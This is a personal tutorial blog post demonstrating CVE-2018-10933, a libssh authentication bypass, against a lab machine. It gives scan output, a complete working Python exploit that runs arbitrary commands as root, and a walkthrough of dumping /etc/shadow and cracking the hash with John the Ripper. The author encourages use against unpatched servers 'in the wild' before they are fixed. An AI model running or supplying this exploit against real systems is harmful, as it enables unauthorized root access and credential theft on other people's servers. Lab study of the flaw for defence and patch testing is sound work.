logo

Practical Computing Advice and Tutorials

Tue: 23 Jul 2019


Site Content

Programming
&
Development


Technical Knowhow


Command Line Interface


Security

CVE-2018-10933

Here, I'm going to demonstrate how you can exploit any server that is running a vulnerable version of libssh.

This vulnerability has a CVE ID of 2018-10933 and can be found in the wild, but for which there's only a short window in which to use this exploit, before the systems will be patched.

Before you read any further, this demonstration contains no live targets; those you will have to work for, in order to get. What we can do, in the lab, is to set up a target computer and have it run an OS that is running this vulnerable version of libssh.

To follow along, you'll need to be able to create a bootable device such as a CD, a DVD or a USB device, and then grab this ISO disk image, from which to create your bootable device. Hint... you can find all the information you need, right here on this website. ;)

In fact, this demonstration pools many of the topics for which I have already created content (the CLI, Python Script, and such) so, if you don't fully understand this post, then a little more reading, may be required, but I'm sure it's all covered; let me know if it's not.

You'll discover that the ISO runs as a live distro, from RAM; no install required. You can run it on a head-less box, or, for convenience, something with tty terminal access. I'm using an old Laptop on which to run the ISO.

Now, you know that there's a new server on your LAN, because you've just put it there. So, a good tool with which to gather some intel on this new server, is nmap, or for the less intrepid, like me, Zenmap; each to their own. What you need is some intel on the target. On my LAN, I discovered this...

Nmap scan report for 192.168.0.9

Host is up (0.0055s latency).

Not shown: 99 closed ports

PORT STATE SERVICE VERSION
22/tcp open ssh (protocol 2.0)
MAC Address: 00:00:39:77:F7:D9 (Toshiba)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.6
Network Distance: 1 hop

A little more digging, with Zenmap, reveals...

PORT STATE SERVICE VERSION
22/tcp open ssh (protocol 2.0)
| fingerprint-strings:
| NULL:
|_ SSH-2.0-libssh_0.8.3
| ssh-hostkey:
|_ 2048 e4:e5:e5:55:33:14:5a:16:19:18:de:ed:96:5a:2a:ec (RSA)

Bingo! The fingerprint of the vulnerable libssh protocol.

We can now use this Python3 Script. You'll need to amend the IP address of 192.168.0.9 to whatever the DHCP service gave to the target on your LAN.

#!/usr/bin/python3

import sys
import paramiko
import socket

s = socket.socket()
s.connect (("192.168.0.9",22))
m = paramiko.message.Message()
t = paramiko.transport.Transport(s)
t.start_client()
m.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
t._send_message(m)
c = t.open_session(timeout=5)
c.exec_command(sys.argv[1])
out = c.makefile("rb",2048)
output = out.read()
out.close()

for stuff in output:
   print (chr (stuff), end="")

That script needs to be saved and then run with some arbitrary input, such as...
# python3 exploit.py "id"
# python3 exploit.py "ls -lta"

You'll maybe want to have a play around and discover what other commands produce some useful intel; I know I did.

One of the more useful commands is: "cat /etc/shadow" to reveal the user name and hashed password...

pentesterlab:$1$vJgVtWtm$Hr5DsuFsvDrAUt4IiNNCK0

... which I then gave to John the Ripper.

Although John came up with the goods, it turns out that you can't simply log into the pentesterlab account over ssh, using the ripped password: it works only on the tty session.

So, we have the potential to do what we like with this server, given that we have root access.